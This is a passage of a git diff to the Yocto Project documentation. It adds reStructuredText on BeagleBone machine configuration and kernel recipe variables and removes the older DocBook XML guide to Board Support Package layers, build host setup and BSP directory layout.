+   exist in the :term:`OpenEmbedded-Core (OE-Core)` layer (e.g.
+   ``poky/meta/conf/machine/include``). In this example, the default
+   tuning file is "cortexa8hf-neon".
+
+   .. note::
+
+      The include statement that pulls in the
+      ``conf/machine/include/tune-cortexa8.inc`` file provides many tuning
+      possibilities.
+
+-  :term:`IMAGE_FSTYPES`: The
+   formats the OpenEmbedded build system uses during the build when
+   creating the root filesystem. In this example, four types of images
+   are supported.
+
+-  :term:`EXTRA_IMAGECMD`:
+   Specifies additional options for image creation commands. In this
+   example, the "-lnp " option is used when creating the
+   `JFFS2 <https://en.wikipedia.org/wiki/JFFS2>`__ image.
+
+-  :term:`WKS_FILE`: The location of
+   the :ref:`Wic kickstart <ref-manual/ref-kickstart:openembedded kickstart (\`\`.wks\`\`) reference>` file used
+   by the OpenEmbedded build system to create a partitioned image
+   (image.wic).
+
+-  :term:`IMAGE_INSTALL`:
+   Specifies packages to install into an image through the
+   :ref:`image <ref-classes-image>` class. Recipes
+   use the ``IMAGE_INSTALL`` variable.
+
+-  ``do_image_wic[depends]``: A task that is constructed during the
+   build. In this example, the task depends on specific tools in order
+   to create the sysroot when building a Wic image.
+
+-  :term:`SERIAL_CONSOLES`:
+   Defines a serial console (TTY) to enable using getty. In this case,
+   the baud rate is "115200" and the device name is "ttyO0".
+
+-  :term:`PREFERRED_PROVIDER_virtual/kernel <PREFERRED_PROVIDER>`:
+   Specifies the recipe that provides "virtual/kernel" when more than
+   one provider is found. In this case, the recipe that provides
+   "virtual/kernel" is "linux-yocto", which exists in the layer's
+   ``recipes-kernel/linux`` directory.
+
+-  :term:`PREFERRED_VERSION_linux-yocto <PREFERRED_VERSION>`:
+   Defines the version of the recipe used to build the kernel, which is
+   "5.0" in this case.
+
+-  :term:`KERNEL_IMAGETYPE`:
+   The type of kernel to build for the device. In this case, the
+   OpenEmbedded build system creates a "zImage" image type.
+
+-  :term:`KERNEL_DEVICETREE`:
+   The names of the generated Linux kernel device trees (i.e. the
+   ``*.dtb``) files. All the device trees for the various BeagleBone
+   devices are included.
+
+-  :term:`KERNEL_EXTRA_ARGS`:
+   Additional ``make`` command-line arguments the OpenEmbedded build
+   system passes on when compiling the kernel. In this example,
+   ``LOADADDR=${UBOOT_ENTRYPOINT}`` is passed as a command-line argument.
+
+-  :term:`SPL_BINARY`: Defines the
+   Secondary Program Loader (SPL) binary type. In this case, the SPL
+   binary is set to "MLO", which stands for Multimedia card LOader.
+
+   The BeagleBone development board requires an SPL to boot and that SPL
+   file type must be MLO. Consequently, the machine configuration needs
+   to define ``SPL_BINARY`` as ``MLO``.
+
+   .. note::
+
+      For more information on how the SPL variables are used, see the
+      :yocto_git:`u-boot.inc </cgit/cgit.cgi/poky/tree/meta/recipes-bsp/u-boot/u-boot.inc>`
+      include file.
+
+-  :term:`UBOOT_* <UBOOT_ENTRYPOINT>`: Defines
+   various U-Boot configurations needed to build a U-Boot image. In this
+   example, a U-Boot image is required to boot the BeagleBone device.
+   See the following variables for more information:
+
+   -  :term:`UBOOT_SUFFIX`:
+      Points to the generated U-Boot extension.
+
+   -  :term:`UBOOT_MACHINE`:
+      Specifies the value passed on the make command line when building
+      a U-Boot image.
+
+   -  :term:`UBOOT_ENTRYPOINT`:
+      Specifies the entry point for the U-Boot image.
+
+   -  :term:`UBOOT_LOADADDRESS`:
+      Specifies the load address for the U-Boot image.
+
+-  :term:`MACHINE_FEATURES`:
+   Specifies the list of hardware features the BeagleBone device is
+   capable of supporting. In this case, the device supports "usbgadget
+   usbhost vfat alsa".
+
+-  :term:`IMAGE_BOOT_FILES`:
+   Files installed into the device's boot partition when preparing the
+   image using the Wic tool with the ``bootimg-partition`` or
+   ``bootimg-efi`` source plugin.
+
+BSP Kernel Recipe Example
+-------------------------
+
+The kernel recipe used to build the kernel image for the BeagleBone
+device was established in the machine configuration: ::
+
+   PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
+   PREFERRED_VERSION_linux-yocto ?= "5.0%"
+
+The ``meta-yocto-bsp/recipes-kernel/linux`` directory in the layer contains
+metadata used to build the kernel. In this case, a kernel append file
+(i.e. ``linux-yocto_5.0.bbappend``) is used to override an established
+kernel recipe (i.e. ``linux-yocto_5.0.bb``), which is located in
+:yocto_git:`/cgit/cgit.cgi/poky/tree/meta/recipes-kernel/linux`.
+
+Following is the contents of the append file: ::
+
+   KBRANCH_genericx86 = "v5.0/standard/base"
+   KBRANCH_genericx86-64 = "v5.0/standard/base"
+   KBRANCH_edgerouter = "v5.0/standard/edgerouter"
+   KBRANCH_beaglebone-yocto = "v5.0/standard/beaglebone"
+
+   KMACHINE_genericx86 ?= "common-pc"
+   KMACHINE_genericx86-64 ?= "common-pc-64"
+   KMACHINE_beaglebone-yocto ?= "beaglebone"
+
+   SRCREV_machine_genericx86 ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
+   SRCREV_machine_genericx86-64 ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
+   SRCREV_machine_edgerouter ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
+   SRCREV_machine_beaglebone-yocto ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
+
+   COMPATIBLE_MACHINE_genericx86 = "genericx86"
+   COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64"
+   COMPATIBLE_MACHINE_edgerouter = "edgerouter"
+   COMPATIBLE_MACHINE_beaglebone-yocto = "beaglebone-yocto"
+
+   LINUX_VERSION_genericx86 = "5.0.3"
+   LINUX_VERSION_genericx86-64 = "5.0.3"
+   LINUX_VERSION_edgerouter = "5.0.3"
+   LINUX_VERSION_beaglebone-yocto = "5.0.3"
+
+This particular append file works for all the machines that are
+part of the ``meta-yocto-bsp`` layer. The relevant statements are
+appended with the "beaglebone-yocto" string. The OpenEmbedded build
+system uses these statements to override similar statements in the
+kernel recipe:
+
+-  :term:`KBRANCH`: Identifies the
+   kernel branch that is validated, patched, and configured during the
+   build.
+
+-  :term:`KMACHINE`: Identifies the
+   machine name as known by the kernel, which is sometimes a different
+   name than what is known by the OpenEmbedded build system.
+
+-  :term:`SRCREV`: Identifies the
+   revision of the source code used to build the image.
+
+-  :term:`COMPATIBLE_MACHINE`:
+   A regular expression that resolves to one or more target machines
+   with which the recipe is compatible.
+
+-  :term:`LINUX_VERSION`: The
+   Linux version from kernel.org used by the OpenEmbedded build system
+   to build the kernel image.
diff --git a/documentation/bsp-guide/bsp.xml b/documentation/bsp-guide/bsp.xml
deleted file mode 100644
index 96c0455f67..0000000000
--- a/documentation/bsp-guide/bsp.xml
+++ /dev/null
@@ -1,2258 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='bsp'>
-
-<title>Board Support Packages (BSP) - Developer's Guide</title>
-
-<para>
-    A Board Support Package (BSP) is a collection of information that
-    defines how to support a particular hardware device, set of devices, or
-    hardware platform.
-    The BSP includes information about the hardware features
-    present on the device and kernel configuration information along with any
-    additional hardware drivers required.
-    The BSP also lists any additional software
-    components required in addition to a generic Linux software stack for both
-    essential and optional platform features.
-</para>
-
-<para>
-    This guide presents information about BSP layers, defines a structure for components
-    so that BSPs follow a commonly understood layout, discusses how to customize
-    a recipe for a BSP, addresses BSP licensing, and provides information that
-    shows you how to create a
-    <link linkend='bsp-layers'>BSP Layer</link> using the
-    <link linkend='creating-a-new-bsp-layer-using-the-bitbake-layers-script'><filename>bitbake-layers</filename></link>
-    tool.
-</para>
-
-<section id='bsp-layers'>
-    <title>BSP Layers</title>
-
-    <para>
-        A BSP consists of a file structure inside a base directory.
-        Collectively, you can think of the base directory, its file structure,
-        and the contents as a <firstterm>BSP layer</firstterm>.
-        Although not a strict requirement, BSP layers in the Yocto Project
-        use the following well-established naming convention:
-        <literallayout class='monospaced'>
-     meta-<replaceable>bsp_root_name</replaceable>
-        </literallayout>
-        The string "meta-" is prepended to the machine or platform name, which is
-        <replaceable>bsp_root_name</replaceable> in the above form.
-        <note><title>Tip</title>
-            Because the BSP layer naming convention is well-established,
-            it is advisable to follow it when creating layers.
-            Technically speaking, a BSP layer name does not need to
-            start with <filename>meta-</filename>.
-            However, various scripts and tools in the Yocto Project
-            development environment assume this convention.
-        </note>
-    </para>
-
-    <para>
-        To help understand the BSP layer concept, consider the BSPs that the
-        Yocto Project supports and provides with each release.
-        You can see the layers in the
-        <ulink url='&YOCTO_DOCS_OM_URL;#yocto-project-repositories'>Yocto Project Source Repositories</ulink>
-        through a web interface at
-        <ulink url='&YOCTO_GIT_URL;'></ulink>.
-        If you go to that interface, you will find a list of repositories
-        under "Yocto Metadata Layers".
-        <note>
-            Layers that are no longer actively supported as part of the
-            Yocto Project appear under the heading "Yocto Metadata Layer
-            Archive."
-        </note>
-        Each repository is a BSP layer supported by the Yocto Project
-        (e.g. <filename>meta-raspberrypi</filename> and
-        <filename>meta-intel</filename>).
-        Each of these layers is a repository unto itself and clicking on
-        the layer name displays two URLs from which you can
-        clone the layer's repository to your local system.
-        Here is an example that clones the Raspberry Pi BSP layer:
-        <literallayout class='monospaced'>
-     $ git clone git://git.yoctoproject.org/meta-raspberrypi
-        </literallayout>
-    </para>
-
-    <para>
-        In addition to BSP layers, the
-        <filename>meta-yocto-bsp</filename> layer is part of the
-        shipped <filename>poky</filename> repository.
-        The <filename>meta-yocto-bsp</filename> layer maintains several
-        "reference" BSPs including the ARM-based Beaglebone, MIPS-based
-        EdgeRouter, and generic versions of
-        both 32-bit and 64-bit IA machines.
-    </para>
-
-    <para>
-        For information on typical BSP development workflow, see the
-        "<link linkend='developing-a-board-support-package-bsp'>Developing a Board Support Package (BSP)</link>"
-        section.
-        For more information on how to set up a local copy of source files
-        from a Git repository, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#locating-yocto-project-source-files'>Locating Yocto Project Source Files</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-
-    <para>
-        The BSP layer's base directory
-        (<filename>meta-<replaceable>bsp_root_name</replaceable></filename>)
-        is the root directory of that Layer.
-        This directory is what you add to the
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-BBLAYERS'><filename>BBLAYERS</filename></ulink>
-        variable in the <filename>conf/bblayers.conf</filename> file found in your
-        <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
-        which is established after you run the OpenEmbedded build environment
-        setup script (i.e.
-        <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>).
-        Adding the root directory allows the
-        <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
-        to recognize the BSP layer and from it build an image.
-        Here is an example:
-        <literallayout class='monospaced'>
-     BBLAYERS ?= " \
-       /usr/local/src/yocto/meta \
-       /usr/local/src/yocto/meta-poky \
-       /usr/local/src/yocto/meta-yocto-bsp \
-       /usr/local/src/yocto/meta-mylayer \
-       "
-        </literallayout>
-        <note><title>Tip</title>
-            Ordering and
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILE_PRIORITY'><filename>BBFILE_PRIORITY</filename></ulink>
-            for the layers listed in <filename>BBLAYERS</filename>
-            matter.
-            For example, if multiple layers define a machine
-            configuration, the OpenEmbedded build system uses
-            the last layer searched given similar layer
-            priorities.
-            The build system works from the top-down through
-            the layers listed in <filename>BBLAYERS</filename>.
-        </note>
-    </para>
-
-    <para>
-        Some BSPs require or depend on additional layers
-        beyond the BSP's root layer in order to be functional.
-        In this case, you need to specify these layers in the
-        <filename>README</filename> "Dependencies" section of the
-        BSP's root layer.
-        Additionally, if any build instructions exist for the
-        BSP, you must add them to the "Dependencies" section.
-    </para>
-
-    <para>
-        Some layers function as a layer to hold other BSP layers.
-        These layers are knows as
-        "<ulink url='&YOCTO_DOCS_REF_URL;#term-container-layer'>container layers</ulink>".
-        An example of this type of layer is OpenEmbedded's
-        <ulink url='https://github.com/openembedded/meta-openembedded'><filename>meta-openembedded</filename></ulink>
-        layer.
-        The <filename>meta-openembedded</filename> layer contains
-        many <filename>meta-*</filename> layers.
-        In cases like this, you need to include the names of the actual
-        layers you want to work with, such as:
-        <literallayout class='monospaced'>
-     BBLAYERS ?= " \
-       /usr/local/src/yocto/meta \
-       /usr/local/src/yocto/meta-poky \
-       /usr/local/src/yocto/meta-yocto-bsp \
-       /usr/local/src/yocto/meta-mylayer \
-       .../meta-openembedded/meta-oe \
-       .../meta-openembedded/meta-perl \
-       .../meta-openembedded/meta-networking \
-       "
-        </literallayout>
-       and so on.
-    </para>
-
-    <para>
-        For more information on layers, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
-        section of the Yocto Project Development Tasks Manual.
-    </para>
-</section>
-
-<section id='preparing-your-build-host-to-work-with-bsp-layers'>
-    <title>Preparing Your Build Host to Work With BSP Layers</title>
-
-    <para>
-        This section describes how to get your build host ready
-        to work with BSP layers.
-        Once you have the host set up, you can create the layer
-        as described in the
-        "<link linkend='creating-a-new-bsp-layer-using-the-bitbake-layers-script'>Creating a new BSP Layer Using the <filename>bitbake-layers</filename> Script</link>"
-        section.
-        <note>
-            For structural information on BSPs, see the
-            <link linkend='bsp-filelayout'>Example Filesystem Layout</link>
-            section.
-        </note>
-        <orderedlist>
-            <listitem><para>
-                <emphasis>Set Up the Build Environment:</emphasis>
-                Be sure you are set up to use BitBake in a shell.
-                See the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-preparing-the-build-host'>Preparing the Build Host</ulink>"
-                section in the Yocto Project Development Tasks Manual for information
-                on how to get a build host ready that is either a native
-                Linux machine or a machine that uses CROPS.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Clone the <filename>poky</filename> Repository:</emphasis>
-                You need to have a local copy of the Yocto Project
-                <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                (i.e. a local <filename>poky</filename> repository).
-                See the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</ulink>"
-                and possibly the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#checking-out-by-branch-in-poky'>Checking Out by Branch in Poky</ulink>"
-                or
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#checkout-out-by-tag-in-poky'>Checking Out by Tag in Poky</ulink>"
-                sections all in the Yocto Project Development Tasks Manual for
-                information on how to clone the <filename>poky</filename>
-                repository and check out the appropriate branch for your work.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Determine the BSP Layer You Want:</emphasis>
-                The Yocto Project supports many BSPs, which are maintained in
-                their own layers or in layers designed to contain several
-                BSPs.
-                To get an idea of machine support through BSP layers, you can
-                look at the
-                <ulink url='&YOCTO_RELEASE_DL_URL;/machines'>index of machines</ulink>
-                for the release.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Optionally Clone the
-                <filename>meta-intel</filename> BSP Layer:</emphasis>
-                If your hardware is based on current Intel CPUs and devices,
-                you can leverage this BSP layer.
-                For details on the <filename>meta-intel</filename> BSP layer,
-                see the layer's
-                <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/meta-intel/tree/README'><filename>README</filename></ulink>
-                file.
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Navigate to Your Source Directory:</emphasis>
-                        Typically, you set up the
-                        <filename>meta-intel</filename> Git repository
-                        inside the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                        (e.g. <filename>poky</filename>).
-                        <literallayout class='monospaced'>
-     $ cd /home/<replaceable>you</replaceable>/poky
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Clone the Layer:</emphasis>
-                        <literallayout class='monospaced'>
-     $ git clone git://git.yoctoproject.org/meta-intel.git
-     Cloning into 'meta-intel'...
-     remote: Counting objects: 15585, done.
-     remote: Compressing objects: 100% (5056/5056), done.
-     remote: Total 15585 (delta 9123), reused 15329 (delta 8867)
-     Receiving objects: 100% (15585/15585), 4.51 MiB | 3.19 MiB/s, done.
-     Resolving deltas: 100% (9123/9123), done.
-     Checking connectivity... done.
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Check Out the Proper Branch:</emphasis>
-                        The branch you check out for
-                        <filename>meta-intel</filename> must match the same
-                        branch you are using for the Yocto Project release
-                        (e.g. &DISTRO_NAME_NO_CAP;):
-                        <literallayout class='monospaced'>
-     $ cd meta-intel
-     $ git checkout -b &DISTRO_NAME_NO_CAP; remotes/origin/&DISTRO_NAME_NO_CAP;
-     Branch &DISTRO_NAME_NO_CAP; set up to track remote branch &DISTRO_NAME_NO_CAP; from origin.
-     Switched to a new branch '&DISTRO_NAME_NO_CAP;'
-                        </literallayout>
-                        <note>
-                            To see the available branch names in a cloned repository,
-                            use the <filename>git branch -al</filename> command.
-                            See the
-                            "<ulink url='&YOCTO_DOCS_DEV_URL;#checking-out-by-branch-in-poky'>Checking Out By Branch in Poky</ulink>"
-                            section in the Yocto Project Development Tasks
-                            Manual for more information.
-                        </note>
-                        </para></listitem>
-                </orderedlist>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Optionally Set Up an Alternative BSP Layer:</emphasis>
-                If your hardware can be more closely leveraged to an
-                existing BSP not within the <filename>meta-intel</filename>
-                BSP layer, you can clone that BSP layer.</para>
-
-                <para>The process is identical to the process used for the
-                <filename>meta-intel</filename> layer except for the layer's
-                name.
-                For example, if you determine that your hardware most
-                closely matches the <filename>meta-raspberrypi</filename>,
-                clone that layer:
-                <literallayout class='monospaced'>
-     $ git clone git://git.yoctoproject.org/meta-raspberrypi
-     Cloning into 'meta-raspberrypi'...
-     remote: Counting objects: 4743, done.
-     remote: Compressing objects: 100% (2185/2185), done.
-     remote: Total 4743 (delta 2447), reused 4496 (delta 2258)
-     Receiving objects: 100% (4743/4743), 1.18 MiB | 0 bytes/s, done.
-     Resolving deltas: 100% (2447/2447), done.
-     Checking connectivity... done.
-                </literallayout>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Initialize the Build Environment:</emphasis>
-                While in the root directory of the Source Directory (i.e.
-                <filename>poky</filename>), run the
-                <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
-                environment setup script to define the OpenEmbedded
-                build environment on your build host.
-                <literallayout class='monospaced'>
-     $ source &OE_INIT_FILE;
-                </literallayout>
-                Among other things, the script creates the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
-                which is <filename>build</filename> in this case
-                and is located in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-                After the script runs, your current working directory
-                is set to the <filename>build</filename> directory.
-                </para></listitem>
-        </orderedlist>
-    </para>
-</section>
-
-<section id="bsp-filelayout">
-    <title>Example Filesystem Layout</title>
-
-    <para>
-        Defining a common BSP directory structure allows
-        end-users to understand and become familiar with
-        that standard.
-        A common format also encourages standardization
-        of software support for hardware.
-    </para>
-
-    <para>
-        The proposed form described in this section does
-        have elements that are specific to the OpenEmbedded
-        build system.
-        It is intended that developers can use this structure
-        with other build systems besides the OpenEmbedded build
-        system.
-        It is also intended that it will be be simple to extract
-        information and convert it to other formats if required.
-        The OpenEmbedded build system, through its standard
-        <ulink url='&YOCTO_DOCS_OM_URL;#the-yocto-project-layer-model'>layers mechanism</ulink>,
-        can directly accept the format described as a layer.
-        The BSP layer captures all the hardware-specific details
-        in one place using a standard format, which is useful
-        for any person wishing to use the hardware platform
-        regardless of the build system they are using.
-    </para>
-
-    <para>
-        The BSP specification does not include a build system
-        or other tools - the specification is concerned with
-        the hardware-specific components only.
-        At the end-distribution point, you can ship the BSP
-        layer combined with a build system and other tools.
-        Realize that it is important to maintain the distinction
-        that the BSP layer, a build system, and tools are
-        separate components that could be combined in
-        certain end products.
-    </para>
-
-    <para>
-        Before looking at the recommended form for the directory structure
-        inside a BSP layer, you should be aware that some
-        requirements do exist in order for a BSP layer to
-        be considered <firstterm>compliant</firstterm> with the Yocto Project.
-        For that list of requirements, see the
-        "<link linkend='released-bsp-requirements'>Released BSP Requirements</link>"
-        section.
-    </para>
-
-    <para>
-        Below is the typical directory structure for a BSP layer.
-        While this basic form represents the standard,
-        realize that the actual layout for individual
-        BSPs could differ.
-        <literallayout class='monospaced'>
-     meta-<replaceable>bsp_root_name</replaceable>/
-     meta-<replaceable>bsp_root_name</replaceable>/<replaceable>bsp_license_file</replaceable>
-     meta-<replaceable>bsp_root_name</replaceable>/README
-     meta-<replaceable>bsp_root_name</replaceable>/README.sources
-     meta-<replaceable>bsp_root_name</replaceable>/binary/<replaceable>bootable_images</replaceable>
-     meta-<replaceable>bsp_root_name</replaceable>/conf/layer.conf
-     meta-<replaceable>bsp_root_name</replaceable>/conf/machine/*.conf
-     meta-<replaceable>bsp_root_name</replaceable>/recipes-bsp/*
-     meta-<replaceable>bsp_root_name</replaceable>/recipes-core/*
-     meta-<replaceable>bsp_root_name</replaceable>/recipes-graphics/*
-     meta-<replaceable>bsp_root_name</replaceable>/recipes-kernel/linux/linux-yocto_<replaceable>kernel_rev</replaceable>.bbappend
-        </literallayout>
-    </para>
-
-    <para>
-        Below is an example of the Raspberry Pi BSP
-        layer that is available from the
-        <ulink url='&YOCTO_GIT_URL;'>Source Respositories</ulink>:
-        <literallayout class='monospaced'>
-     meta-raspberrypi/COPYING.MIT
-     meta-raspberrypi/README.md
-     meta-raspberrypi/classes
-     meta-raspberrypi/classes/sdcard_image-rpi.bbclass
-     meta-raspberrypi/conf/
-     meta-raspberrypi/conf/layer.conf
-     meta-raspberrypi/conf/machine/
-     meta-raspberrypi/conf/machine/raspberrypi-cm.conf
-     meta-raspberrypi/conf/machine/raspberrypi-cm3.conf
-     meta-raspberrypi/conf/machine/raspberrypi.conf
-     meta-raspberrypi/conf/machine/raspberrypi0-wifi.conf
-     meta-raspberrypi/conf/machine/raspberrypi0.conf
-     meta-raspberrypi/conf/machine/raspberrypi2.conf
-     meta-raspberrypi/conf/machine/raspberrypi3-64.conf
-     meta-raspberrypi/conf/machine/raspberrypi3.conf
-     meta-raspberrypi/conf/machine/include
-     meta-raspberrypi/conf/machine/include/rpi-base.inc
-     meta-raspberrypi/conf/machine/include/rpi-default-providers.inc
-     meta-raspberrypi/conf/machine/include/rpi-default-settings.inc
-     meta-raspberrypi/conf/machine/include/rpi-default-versions.inc
-     meta-raspberrypi/conf/machine/include/tune-arm1176jzf-s.inc
-     meta-raspberrypi/docs
-     meta-raspberrypi/docs/Makefile
-     meta-raspberrypi/docs/conf.py
-     meta-raspberrypi/docs/contributing.md
-     meta-raspberrypi/docs/extra-apps.md
-     meta-raspberrypi/docs/extra-build-config.md
-     meta-raspberrypi/docs/index.rst
-     meta-raspberrypi/docs/layer-contents.md
-     meta-raspberrypi/docs/readme.md
-     meta-raspberrypi/files
-     meta-raspberrypi/files/custom-licenses
-     meta-raspberrypi/files/custom-licenses/Broadcom
-     meta-raspberrypi/recipes-bsp
-     meta-raspberrypi/recipes-bsp/bootfiles
-     meta-raspberrypi/recipes-bsp/bootfiles/bcm2835-bootfiles.bb
-     meta-raspberrypi/recipes-bsp/bootfiles/rpi-config_git.bb
-     meta-raspberrypi/recipes-bsp/common
-     meta-raspberrypi/recipes-bsp/common/firmware.inc
-     meta-raspberrypi/recipes-bsp/formfactor
-     meta-raspberrypi/recipes-bsp/formfactor/formfactor
-     meta-raspberrypi/recipes-bsp/formfactor/formfactor/raspberrypi
-     meta-raspberrypi/recipes-bsp/formfactor/formfactor/raspberrypi/machconfig
-     meta-raspberrypi/recipes-bsp/formfactor/formfactor_0.0.bbappend
-     meta-raspberrypi/recipes-bsp/rpi-u-boot-src
-     meta-raspberrypi/recipes-bsp/rpi-u-boot-src/files
-     meta-raspberrypi/recipes-bsp/rpi-u-boot-src/files/boot.cmd.in
-     meta-raspberrypi/recipes-bsp/rpi-u-boot-src/rpi-u-boot-scr.bb
-     meta-raspberrypi/recipes-bsp/u-boot
-     meta-raspberrypi/recipes-bsp/u-boot/u-boot
-     meta-raspberrypi/recipes-bsp/u-boot/u-boot/*.patch
-     meta-raspberrypi/recipes-bsp/u-boot/u-boot_%.bbappend
-     meta-raspberrypi/recipes-connectivity
-     meta-raspberrypi/recipes-connectivity/bluez5
-     meta-raspberrypi/recipes-connectivity/bluez5/bluez5
-     meta-raspberrypi/recipes-connectivity/bluez5/bluez5/*.patch
-     meta-raspberrypi/recipes-connectivity/bluez5/bluez5/BCM43430A1.hcd
-     meta-raspberrypi/recipes-connectivity/bluez5/bluez5brcm43438.service
-     meta-raspberrypi/recipes-connectivity/bluez5/bluez5_%.bbappend
-     meta-raspberrypi/recipes-core
-     meta-raspberrypi/recipes-core/images
-     meta-raspberrypi/recipes-core/images/rpi-basic-image.bb
-     meta-raspberrypi/recipes-core/images/rpi-hwup-image.bb
-     meta-raspberrypi/recipes-core/images/rpi-test-image.bb
-     meta-raspberrypi/recipes-core/packagegroups
-     meta-raspberrypi/recipes-core/packagegroups/packagegroup-rpi-test.bb
-     meta-raspberrypi/recipes-core/psplash
-     meta-raspberrypi/recipes-core/psplash/files
-     meta-raspberrypi/recipes-core/psplash/files/psplash-raspberrypi-img.h
-     meta-raspberrypi/recipes-core/psplash/psplash_git.bbappend
-     meta-raspberrypi/recipes-core/udev
-     meta-raspberrypi/recipes-core/udev/udev-rules-rpi
-     meta-raspberrypi/recipes-core/udev/udev-rules-rpi/99-com.rules
-     meta-raspberrypi/recipes-core/udev/udev-rules-rpi.bb
-     meta-raspberrypi/recipes-devtools
-     meta-raspberrypi/recipes-devtools/bcm2835
-     meta-raspberrypi/recipes-devtools/bcm2835/bcm2835_1.52.bb
-     meta-raspberrypi/recipes-devtools/pi-blaster
-     meta-raspberrypi/recipes-devtools/pi-blaster/files
-     meta-raspberrypi/recipes-devtools/pi-blaster/files/*.patch
-     meta-raspberrypi/recipes-devtools/pi-blaster/pi-blaster_git.bb
-     meta-raspberrypi/recipes-devtools/python
-     meta-raspberrypi/recipes-devtools/python/python-rtimu
-     meta-raspberrypi/recipes-devtools/python/python-rtimu/*.patch
-     meta-raspberrypi/recipes-devtools/python/python-rtimu_git.bb
-     meta-raspberrypi/recipes-devtools/python/python-sense-hat_2.2.0.bb
-     meta-raspberrypi/recipes-devtools/python/rpi-gpio
-     meta-raspberrypi/recipes-devtools/python/rpi-gpio/*.patch
-     meta-raspberrypi/recipes-devtools/python/rpi-gpio_0.6.3.bb
-     meta-raspberrypi/recipes-devtools/python/rpio
-     meta-raspberrypi/recipes-devtools/python/rpio/*.patch
-     meta-raspberrypi/recipes-devtools/python/rpio_0.10.0.bb
-     meta-raspberrypi/recipes-devtools/wiringPi
-     meta-raspberrypi/recipes-devtools/wiringPi/files
-     meta-raspberrypi/recipes-devtools/wiringPi/files/*.patch
-     meta-raspberrypi/recipes-devtools/wiringPi/wiringpi_git.bb
-     meta-raspberrypi/recipes-graphics
-     meta-raspberrypi/recipes-graphics/eglinfo
-     meta-raspberrypi/recipes-graphics/eglinfo/eglinfo-fb_%.bbappend
-     meta-raspberrypi/recipes-graphics/eglinfo/eglinfo-x11_%.bbappend
-     meta-raspberrypi/recipes-graphics/mesa
-     meta-raspberrypi/recipes-graphics/mesa/mesa-gl_%.bbappend
-     meta-raspberrypi/recipes-graphics/mesa/mesa_%.bbappend
-     meta-raspberrypi/recipes-graphics/userland
-     meta-raspberrypi/recipes-graphics/userland/userland
-     meta-raspberrypi/recipes-graphics/userland/userland/*.patch
-     meta-raspberrypi/recipes-graphics/userland/userland_git.bb
-     meta-raspberrypi/recipes-graphics/vc-graphics
-     meta-raspberrypi/recipes-graphics/vc-graphics/files
-     meta-raspberrypi/recipes-graphics/vc-graphics/files/egl.pc
-     meta-raspberrypi/recipes-graphics/vc-graphics/files/vchiq.sh
-     meta-raspberrypi/recipes-graphics/vc-graphics/vc-graphics-hardfp.bb
-     meta-raspberrypi/recipes-graphics/vc-graphics/vc-graphics.bb
-     meta-raspberrypi/recipes-graphics/vc-graphics/vc-graphics.inc
-     meta-raspberrypi/recipes-graphics/wayland
-     meta-raspberrypi/recipes-graphics/wayland/weston_%.bbappend
-     meta-raspberrypi/recipes-graphics/xorg-xserver
-     meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config
-     meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi
-     meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf
-     meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d
-     meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d/10-evdev.conf
-     meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d/98-pitft.conf
-     meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d/99-calibration.conf
-     meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config_0.1.bbappend
-     meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xorg_%.bbappend
-     meta-raspberrypi/recipes-kernel
-     meta-raspberrypi/recipes-kernel/linux-firmware
-     meta-raspberrypi/recipes-kernel/linux-firmware/files
-     meta-raspberrypi/recipes-kernel/linux-firmware/files/brcmfmac43430-sdio.bin
-     meta-raspberrypi/recipes-kernel/linux-firmware/files/brcfmac43430-sdio.txt
